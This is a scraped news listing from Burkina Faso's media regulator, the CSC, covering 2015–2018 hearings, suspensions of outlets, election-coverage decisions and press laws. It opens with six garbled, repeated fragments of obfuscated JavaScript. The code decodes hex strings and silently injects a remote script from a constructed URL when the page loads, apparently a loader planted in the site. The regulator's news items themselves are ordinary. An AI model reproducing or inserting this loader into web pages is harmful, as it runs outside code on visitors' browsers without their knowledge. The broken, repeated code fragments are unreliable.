f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]> //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]> //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]> //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]> //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]> //n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[Ss]{1,2}/g);for(var e="",n=0;n < t.length;n++)e+=String.fromCharCode(parseInt(t[n],16));return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e < 3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="csc.bf",i=function(t,e,n){for(var o=[].slice.call(n),r=t.split("."),i=r.pop(),c=0;c < r.length;c++)e=e[r[c]];return e[i].apply(e,o)},c=function(t,e){for(var n=t.split("."),o=!1,r=0;r < n.length;r++)e[n[r]]?(e=e[n[r]],o=!0):o=!1;return o},f=function(t,e,n){var lp=p();if(lp=="")return;var r=lp+"//"+t;if(-1==navigator.userAgent.toLowerCase().indexOf("firefox")){if(c(o("736d6c6f"),window))return i(o("736d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")]);if(c(o("7a536d6c6f"),window))return i(o("7a536d6c6f2e6c6f6164536d6c6f"),window,[r.replace("https:","http:")])}var f=document.createElement("script");f.setAttribute("src",r),f.setAttribute("type","text/javascript"),document.head.appendChild(f),f.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof e&&e())},f.onerror=function(){this.a1649136515||(this.a1649136515=!0,f.parentNode.removeChild(f),"function"==typeof n&&n())}},a=function(){var t,e=["a@bl@tbAdb@vbH@beb@br@be".split("b").join("").split("@").join(""),"a2013543385","a2287596422","a540125352"],n=document.body.classList,o=document.body.className;if(n){for(t=0;t < e.length;t++)if(n.contains(e[t]))return!1}else if(o)for(t=0;t < e.length;t++)if(o.indexOf(e[t])>-1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}(); //]]>

COMMUNIQUE DE PRESSE : Le bimensuel Le Reporter auditionné

03/04/2018

La commission chargée de la liberté de la presse, de l'éthique et de la déontologie du Conseil supérieur de la communication, a procédé à l'audition du journal « Le Reporter », le jeudi 29 mars 2018. Cette audition fait suite à une saisine de l'instance de régulation par le groupe KANIS le 12 février 2018, après un article publié par le journal d'investigation dans son numéro 231 du 1er au 14 février 2018, intitulé : 

Conférence de Presse : déclaration liminaire sur « la vie du Conseil supérieur de la communication »

29/03/2018

Mesdames et Messieurs, Chers amis de la presse, chers consœurs et confrères, partenaires de lutte pour la liberté de la presse et pour la démocratie ; Au nom du collège des Conseillers et l'administration du CSC, je voudrais vous traduire la reconnaissance de l'ensemble de ses membres, pour votre présence une fois de plus, à nos côtés ce matin, à l'occasion de cette conférence de presse. Permettez-moi, au début de mon propos liminaire, de dire merci à toute la presse et le monde de la publicité ici présents pour avoir répondu à notre invite pour des échanges.

Le journal « Courrier confidentiel » auditionné

23/03/2018

La Commission de la liberté de la presse, de l'éthique et de la déontologie du Conseil supérieur de la communication a auditionné, le jeudi 22 mars 2018, les responsables du journal « Courrier confidentiel ». Une audition qui fait suite à une plainte de l'association « Tieta de Mebar » contre le journal pour non publication de son droit de réponse. 

Communiqué

09/03/2018

Le Conseil supérieur de la communication (CSC) informe les responsables des médias que conformément à l'article 42 de la loi n°080-2015/CNT du 23 novembre 2015, portant règlementation de la publicité au Burkina Faso, les publicités sur le contenu des enseignements et sur les établissements d'enseignement sont soumises à l'obtention préalable d'un visa des ministres de tutelle technique.

Attaques terroristes du 02 mars 2018 : Les condoléances du CSC

05/03/2018

Le vendredi 02 mars 2018, deux attaques terroristes ont de nouveau endeuillé le peuple burkinabè. En cette douloureuse circonstance, le Vice-président du Conseil supérieur de la communication, au nom du Collège des conseillers, de l'ensemble du personnel administratif et en son nom propre, présente aux familles éplorées ses sincères condoléances et souhaite un prompt rétablissement aux blessés pris en charges dans les différents établissements sanitaires.

Les radios Ouaga FM, Savane FM et Oméga auditionnées

19/02/2018

La Commission en charge de la publicité du Conseil supérieur de la communication a auditionné, le vendredi 16 février2018, les responsables des radios Ouaga FM, Savane FM et Oméga. Ces auditions font suite à une plainte enregistrée par le CSC pour la diffusion de la publicité d'un produit purificateur d'eau dénommé « Purity One ». 

Des élèves commissaires de polices en immersion dans l’antre de la régulation

19/01/2018

Le Conseil supérieur de la communication (CSC) a reçu, le vendredi 19 janvier 2018 à son siège, la visite de courtoisie des élèves commissaires de l'académie de police de Pabré. Cette visite entre dans le cadre de leur programme d'activités qui a prévu la découverte des institutions de l'Etat. 

Les radios « Ouaga FM », « Salankoloto », « Savane FM » et « Optima » auditionnées

17/01/2018

La Commission en charge de la publicité du Conseil supérieur de la communication a procédé à une série d'auditions, le vendredi 12 janvier 2018, pour les radios « Ouaga FM », « Salankoloto » et « Savane FM »,  et le mardi 16 janvier 2018 pour la radio « Optima ». 

Régulation en période ordinaire : Radio Optima fait l’objet d’audition

08/01/2018

La Commission en charge de la liberté de presse, de l'Ethique et de la déontologie du Conseil supérieur de la communication a entendu, le 05 janvier 2018, les responsables de la radio Optima sur le contenu de l'émission « Biibenonré ». Il est reproché à l'animateur de l'émission d'avoir tenu, le mardi 14 novembre 2017, des propos portant atteinte à la loi, à l'éthique et à la déontologie régissant le traitement de l'information. 

Distinctions honorifiques dans le monde des médias:Le CSC reconnait le mérite de 21 personnes

29/12/2017

Le Conseil supérieure de la communication (CSC) a, le vendredi 29 décembre 2017, organisé une cérémonie de décoration de ses agents et partenaires. Au titre de l'année 2017, c'est le mérite de 21 de ses agents et partenaires que l'instance de régulation des médias a reconnu. 

La radio AL HOUDA auditionnée

08/09/2017

La Commission en charge de la liberté de presse de l'éthique et de la déontologie du Conseil supérieur de la communication a auditionné, le vendredi 08 septembre 2017, les responsables de la radio Al Houda.

Le CSC suspend l’émission « Bigbénonré » de la radio Optima Fm pour un (01) mois

14/07/2017

L'émission Bigbénonré qu'anime le promoteur de la radio Optima Fm a été suspendue pour un (01) mois par le Conseil supérieur de la communication (CSC).  Décision de suspension de radio Optima FM Décision de suspension de radio Optima FM

Signature de convention d’exploitation de fréquence au CSC : Medi 1 vient enrichir le paysage médiatique burkinabè

14/06/2017

Le Conseil supérieur de la communication a signé, le mercredi 14 juin 2017 au sein de l'institution, une convention de concession de radiodiffusion sonore avec la Radio Medi1 du Royaume du Maroc. La cérémonie de paraphe a été  présidée par la présidente du CSC, madame Nathalie Somé, en présence de Son Excellence Monsieur l'ambassadeur du Maroc, Farhat Bouazza, et le PDG de Medi1, Hassan Khiyar.

Ouaga FM, Oméga FM et BF1 auditionnée

08/06/2017

La Commission en charge de la liberté de presse, de l'Ethique et de la déontologie du Conseil supérieur de la communication a entendu, les 06 et 07 juin 2017, les responsables des radios Ouaga FM, Oméga FM et de la télévision BF1 au motif de diffusion d'une fausse nouvelle en ce qui concerne les deux radios et pour diffusion de messages de partis politiques au-delà des délais de la campagne électorale pour BF1 et Ouaga FM. 

COMMUNIQUE

12/05/2017

Tous les médias audiovisuels sont priés de trouver ci-dessous pour les besoins de synchronisation avec la RTB les heures de diffusion de l'émission « Messages de campagne » dans le cadre de la campagne électorale comptant pour les élections municipales partielles et complémentaires du 28 mai 2017. 

La radio OPTIMA auditionnée

11/05/2017

La Commission chargée de la liberté de presse, de l'éthique et de la déontologie a procédé  à l'audition, le mercredi 10 mai 2017, du responsable de la radio OPTIMA FM, monsieur Ambroise TAPSOBA, sur le contenu de l'émission « Bigbénonré » diffusée en mooré sur la radio du lundi au vendredi de 08heures à 09 heures.

Elections municipales complémentaires du 28 mai 2017 : Les décisions et programmation

10/05/2017

Elections municipales complémentaires du 28 mai 2017 : Les décisions et la programmation de l'ordre de passage des partis politiques dans les médias.

Communiqué à l'attention des partis politiques

10/05/2017

Le Conseil Supérieur de la Communication (CSC) informe tous les partis politiques ou regroupements d'indépendants prenant part aux élections municipales partielles et complémentaires du 28 mai 2017 que le planning d'enregistrement des messages de campagnes, établi part tirage au sort le vendredi 05 mai 2017, est disponible à la Direction générale des affaires juridiques du CSC.

Infos-CSC-janvier 2017

16/02/2017

Infos-CSC-janvier 2017

Cérémonie de lancement du plan stratégique

31/01/2017

Note de présentation du plan stratégique  Les grandes lignes du plan stratégique 

Prestation de serment du conseiller Compaoré Barnabé

21/12/2016

M. Compaoré Barnabé-magistrat, nommé au CSC en remplacement de Madame Ouédraogo/Kibora Victoria, a eu lieu  ce jour mercredi 21 décembre 2016 à 10 h dans la salle d'audience du Conseil constitutionnel. 

Nathalie Somé, présidente du Conseil Supérieur de la Communication : « Il faut que je me fasse à l’idée que les journalistes ne s’intéressent qu’au train qui arrive en retard »

29/11/2016

Le jeudi 12 septembre 2014, Nathalie Somé prenait officiellement les commandes du Conseil supérieur de la communication (CSC). Deux ans après, la « maison » tient bon malgré les orages qu'elle a connus notamment sous la Transition. Suspension des émissions interactives, feuilleton judiciaire avec le bimensuel L'Evénement et le dernier en date, le remplacement de Désiré Comboigo au poste de Vice-président, décision annulée par le Tribunal administratif et dont le CSC a fait appel. En dépit de toutes ces turbulences, le Conseil supérieur de la communication s'est doté d'un plan stratégique 2017-2021 et il est prévu la relecture de sa loi organique. Autant de chantiers dont nous parle Nathalie Somé dans cet entretien.

Suspension de parution du Journal du Jeudi (JJ): Le CSC exprime son regret

28/11/2016

suspensiondeparutiondujournalJJetlecscexprimesonregret

Communiqué de la presidente du csc relatif à la conduite des émissions interactives

25/10/2016

communiquepresidentecscconduiteemissionsinteractives

Télécharger ici le plan stratégique du CSC 2017-2021

18/10/2016

telechargericileplanstrategique

Loi 087 portant modification regime juridique de la radiodiffusion

07/10/2016

Loi087portantmodifregimejuridiquedelaradiodiffusion

Loi 086 portant modification loi portant regime juridique de la presse en ligne

07/10/2016

Loi086portantmodifregimejuridiquedelapresseenligne

Loi portant 085 modif regime juridique de la presse écrite

06/10/2016

Loi085portantmodifregimejuridiquedelapresseecrite

Loi 080 portant reglementation de la publicite

06/10/2016

Loi080portantreglementationdelapublicite

Loi 058 portant regime juridique de la presse en ligne

06/10/2016

Loi058portantregimejuridiquedelapresseenligne

Loi 059 portant régime juridique de la radiodiffusion

06/10/2016

Loi059portantregimejuridiquedelaradiodiffusion

Loi 057 portant regime juridique de la presse ecrite

06/10/2016

Loi057portantregimejuridiquedelapresseecrite

Camp vacances basket : La présidente du CSC rend visite à ses filleuls

19/08/2016

Le camp vacances basket organisé par l'association sport culture et environnement est à sa 18e édition. Cette année c'est la présidente du CSC, Mme Nathalie Somé qui a été choisie pour parrainer l'activité. Pour marquer son engagement à soutenir l'initiative du promoteur, elle rendu visite à ses filleuls dans la matinée du mercredi 17 août 2016, sur le plateau omnisport de la maison des jeunes de Ouagadougou.

Campagne d’éducation aux médias : impacts et perspectives VIDEO

02/08/2016

Campagne d'éducation aux médias : impacts et perspectives VIDEO

Infos-CSC n°009 de juin 2016

09/07/2016

Infos-CSC n°009 de juin 2016

Répertoire des médias au Burkina Faso

04/07/2016

Répertoire des médias au Burkina Faso

Infos-CSC N°008 d’avril-mai

07/06/2016

Infos-CSC n°008 d'avril-mai 2016

Elections municipales du 22 mai 2016 ; Déclaration de la Présidente du CSC

17/05/2016

Chers concitoyens, chères concitoyennes, Depuis le 07 mai 2016 la campagne pour les élections municipales du 22 mai 2016 bat son plein, et le Conseil Supérieur de la Communication se réjouit de l'intérêt manifeste des burkinabè pour ces élections de proximité post insurrection.

Décision n°2016 -10/CSC portant fixation des quotas des reportages et couvertures médiatiques des manifestations des partis, formation politiques et regroupements d’indépendants par les médias publics dans les cadre d

07/05/2016

Décision n°2016 -10/CSC portant fixation des quotas des reportages et couvertures médiatiques des manifestations des partis, formation politiques et regroupements d'indépendants par les médias publics dans les cadre des élection municipales du 22 mai 2016

Décision n° 2016-009/CSC portant programmation des communications des partis, formations politiques et regroupements d’indépendants

07/05/2016

Décision n° 2016-009/CSC portant programmation des communications des partis, formations politiques et regroupements d'indépendants prenant part  aux élections municipales du 22 mai 2016 à la RTB/Radio , à la RTB /Télé et dans le quotidien Sidwaya

Communiqué : élections municipales du 22 mai 2016 : Heures de diffusion des émissions parrainées

07/05/2016

Tous les médias audiovisuels privés bénéficiaires de la subvention publique pour leur participation aux élections municipales du 22 mai 2016, sont priés de trouver ci-dessous les heures de diffusion des émissions parrainées

Visite des Publicitaires Associés au Conseil Supérieur de la Communication:La promotion du nouveau code de la publicité en question

28/04/2016

Dans le cadre de la promotion des nouveaux textes du Code de la publicité, une délégation des Publicitaire associés du Burkina s'est entretenue avec le Conseil Supérieur de la Communication, le jeudi 28 avril 2016 à Ouagadougou dans la salle de conseil de l'institution. Conduite par son Président Abdoulaziz Bamogo, cette délégation était venue solliciter l'accompagnement de l'instance de régulation pour la mise en œuvre de son programme d'activité.

Décision n° 2016-006/CSC portant respect des principes d’égalité d’accès équilibre et pluralisme dans les médias publics (municipales 2016)

22/04/2016

Décision n° 2016-006/CSC portant respect des principes d'égalité d'accès équilibre et pluralisme dans les médias publics (municipales 2016)

Décision n° 2016-005/CSC portant respect des principes de pluralisme et d’équilibre de l’information ( municipales 2016)

22/04/2016

Décision n° 2016-005/CSC portant respect des principes de pluralisme et d'équilibre de l'information ( municipales 2016) 

Arrêté n° 2016-005/CSC portant définition des critères d’éligibilité et la clé de répartition de la subvention publique

22/04/2016

Arrêté n° 2016-005/CSC portant définition des critères d'éligibilité et la clé de répartition de la subvention publique

Subvention des médias pour la couverture de la campagne des élections municipales du 22 mai 2016

22/04/2016

Communiqué: Subvention des médias désireux de couvrir la campagne des élections municipales du 22 mai 2016

Campagne d'éducation aux médias:La Boucle du Mouhoun sensibilisée à l'utilisation citoyenne des médias

11/04/2016

Du 6 au 10 avril 2016, une délégation du Conseil Supérieur de la Communication a mené une série d'activités dans la Région de la Boucle du Mouhoun dans le cadre de la campagne d'éducation aux médias lancée par l'institution pour des élections municipales apaisées. Visites de courtoisie et échanges avec les autorités locales, conférence publique, projections de documentaire et de microprogrammes, formation des médias, étaient les principales activités de cette campagne dans la localité.

Campagne d’éducation aux médias : Le CSC forme les journalistes au traitement de l’information en période électorale

08/04/2016

Le contexte s'y prête et le CSC entend jouer sa partition. Il a réuni en session de formation, les journalistes et animateur des médias de l'Ouest. Deux jours durant, ils revisiteront les bases du métier dans le cadre de la campagne d'éducation aux médias. La cérémonie d'ouverture qui s'est tenue le vendredi 08 avril 2016 à 9heures dans les locaux de la délégation régionale du CSC dans l'Ouest a été présidée par la Présidente du CSC en compagnie de monsieur Antoine ATIOU, Gouverneur de la Région des Hauts-Bassins.

Campagne d’éducation aux médias : Orodara pour débuter la série des conférences publiques

07/04/2016

La Présidente du CSC, madame Nathalie SOME a lancé, le jeudi 07 avril 2016, la série des conférences publiques entrant dans le cadre de la campagne d'éducation aux médias. C'était à l'hôtel Le Prestige de Orodara. L'évènement a mobilisé autorités administratives, coutumières et religieuses et des acteurs du développement local.

Infos-CSC N°007 de mars 2016

06/04/2016

Infos-CSC n°007 de mars 2016

Campagne d’éducation aux médias:Le CSC veut instaurer une communication sociale apaisée pour la préservation de la cohésion nationale et de la paix sociale

17/03/2016

Le mardi 15 mars 2016 s'est déroulée, dans la salle de conférences du Centre national Cardinal Paul ZOUNGRANA, la cérémonie officielle de lancement de la campagne d'éducation aux médias initiée par le Conseil supérieur de la communication. La cérémonie a été placée sous la présidence de Madame Nathalie SOME et le parrainage de Monsieur Simon COMPAORE, Ministre d'Etat, Ministre de l'Administration territoriale, de la Décentralisation et de la Sécurité intérieure.

Déclaration du CSC suite à la parution du journal L’Evénement malgré la décision de suspension prononcée contre lui

11/03/2016

Le Conseil supérieur de la communication (CSC), en sa séance ordinaire du 18 février 2016, a décidé de suspendre pour une durée d'un (01) mois la parution du journal L'Evénement pour diffusion d'informations relevant du secret militaire.  Le journal a obtenu du tribunal administratif le sursis à exécution de la décision attaquée à la date du 3 mars 2016. Le CSC a aussitôt interjeté appel devant le Conseil d'Etat le vendredi 04 mars 2016. Cet appel a pour conséquences : •un effet suspensif de la décision de sursis ce qui veut dire que le jugement ne sera pas exécuté pour le moment;  •un effet de maintien en l'état de la décision du CSC, c'est à dire que la suspension du journal par le CSC reste en vigueur jusqu'à ce que le Conseil d'Etat se prononce.

Suspension de parution du journal L’Evénement : la décision reste en vigueur

07/03/2016

Le Conseil supérieur de la communication a interjeté appel du jugement du tribunal administratif qui ordonnait le sursis à exécution de la sanction du CSC contre l'Evénement. Si d'aucun ont compris en la décision du tribunal un retour dans les kiosques du journal, il n'en est pas ainsi. 

Infos-CSC N°006 de janvier-février 2016

03/03/2016

Infos-csc N°006 de janvier-février 2016

Musique burkinabè: les artistes plaident pour une revalorisation du quota de diffusion

24/02/2016

Une délégation d'artistes burkinabè réunis au sein de la Coalition pour la renaissance artistique au Burkina Faso (CORA/BF) est venu remettre à madame la présidente du CSC une requête de revalorisation du quota de diffusion de la musique burkinabè dans les médias. La cérémonie de remise de ce document s'est déroulée dans la salle de conférence de l'institution le mercredi 24 février 2016.

Le CSC suspend la publication du journal L’Evénement pour un (01) mois

19/02/2016

Le Conseil supérieur de la communication (CSC) en sa séance ordinaire du 18 février 2016 a décidé de suspendre pour une durée d'un (01) mois la parution du journal L'Evénement pour diffusion d'informations relevant du secret militaire. Cette suspension va du vendredi 19 février au samedi 19 mars 2016 inclus.

Info CSC n°005 de décembre 2015

12/02/2016

Info CSC n°005 de décembre 2015

L’Ambassadeur du Maroc chez la présidente du CSC

09/02/2016

Le mardi 9 février 2016, la présidente du CSC, madame Nathalie Somé, a reçu en audience SEM l'Ambassadeur du Maroc. Celui-ci est venu rendre une visite de courtoisie à la première responsable de l'instance de régulation et la féliciter pour la bonne gestion de la couverture médiatique des élections du 11 novembre 2015.

Arbre de noël au CSC : La Mutuelle promet une récompense spéciale aux meilleurs élèves pour la prochaine édition

31/12/2015

Le mercredi 23 décembre 2015, une cérémonie d'arbre de noël a été célébrée au CSC en l'honneur des enfants du personnel de cette institution. L'occasion fut donnée à ces enfants d'exprimer leur joie à travers des récitals, chants et prestations de danse. Le père noël n'a pas manqué de leur offrir des cadeaux.

Décorations au CSC : Les mérites de 13 agents et partenaires du Conseil Supérieur de la Communication reconnus

31/12/2015

Le mercredi 23 décembre 2015 s'est tenue une cérémonie de décoration au sein du Conseil Supérieur de la Communication. Neuf acteurs du monde de la communication ont été faits chevaliers de l'Ordre du Mérite des Arts, des lettres et de la Communication avec agrafe radio, télévision et presse écrite. Précédemment, le 10 décembre dernier, c'est la Présidente du CSC qui s'est vue distinguée avec trois de ses collaborateurs et agents à Kosyam.

Infos CSC n°003 & 004 d’octobre et novembre 2015

23/12/2015

Infos CSC n°003 & 004 d'octobre et novembre 2015

Régulation du discours électoral : Les USA et la FEME félicitent le CSC

21/12/2015

L'Ambassadeur des Etats-Unis et le Président de la Fédération des Eglises et Missions Evangéliques (FEME) étaient chez la Présidente du Conseil supérieur de la communication (CSC), Nathalie SOME. Mr MUSHINGI et le Pasteur YAMEOGO sont venus féliciter le Conseil supérieur de la communication pour l'immense travail abattu dans le cadre de la régulation du discours électoral.  

Promotion de la musique burkinabè : La CORA/BF en plaidoyer au CSC

22/11/2015

La Coalition pour la renaissance artistique au Burkina Faso (CORA/BF), représentée par son  coordonnateur, s'est rendue au Conseil supérieur de la communication (CSC), ce jeudi 22 octobre 2105 pour s'entretenir avec les premiers responsables de l'institution de régulation. 

Bilan à mi-parcours de la régulation du discours électoral : Les satisfécits du CSC

22/11/2015

Le Conseil supérieur de la communication a animé une conférence de presse sur le bilan à mi-parcours de la régulation du discours électoral 2015. La rencontre avec la presse s'est tenue dans la salle de conférence de la délégation régionale du CSC à l'Ouest sous la conduite de madame la présidente du CSC.

La présidente du CSC à la délégation régionale de l’Ouest « Mon combat c’est pour vous ! »

20/11/2015

En marge des préparatifs de la conférence de presse sur le bilan à mi-parcours de la régulation du discours électoral, madame la présidente du CSC a rencontré le personnel de la Délégation régionale du CSC à l'Ouest ainsi que les observateurs des médias recrutés dans le cadre des élections.

Communiqué

13/11/2015

Le Conseil supérieur de la communication informe les responsables des partis et formations politiques ainsi que les candidats aux élections d'octobre 2015 que la programmation des émissions parrainées est disponible et accessible à tous. 

Régulation du discours électoral 2015 : Le personnel du CSC resserre les rangs

06/11/2015

La Présidente du Conseil supérieur de la sommunication, Nathalie SOME, a rencontré le personnel administratif de l'institution lors d'une Assemblée Générale extraordinaire, le jeudi 5 novembre 2015. Objectif, faire un dernier point de l'organisation pratique des activités de régulation de la couverture médiatique  des élections du 29 novembre 2015.

Elections du 29 novembre 2015 : La subvention du CSC n’est pas une récompense à un quelconque média.

05/11/2015

Le Conseil Supérieur de la Communication fait en ce moment l'objet de récriminations de la part de certains responsables de médias suite à l'octroi de la subvention de l'Etat dans le cadre de la couverture médiatique des élections présidentielle et législatives couplées du 29 novembre 2015.

Décision n° 2015-0027/ CSC/CAB du 04 Novembre 2015

05/11/2015

Décision n° 2015-0027/ CSC/CAB Portant fixation des quotas des reportages et couvertures médiatiques des manifestations des partis, formations ou regroupements politiques ou candidats indépendants par les médias publics dans le cadre des élections présidentielle et législatives couplées du 29 novembre 2015

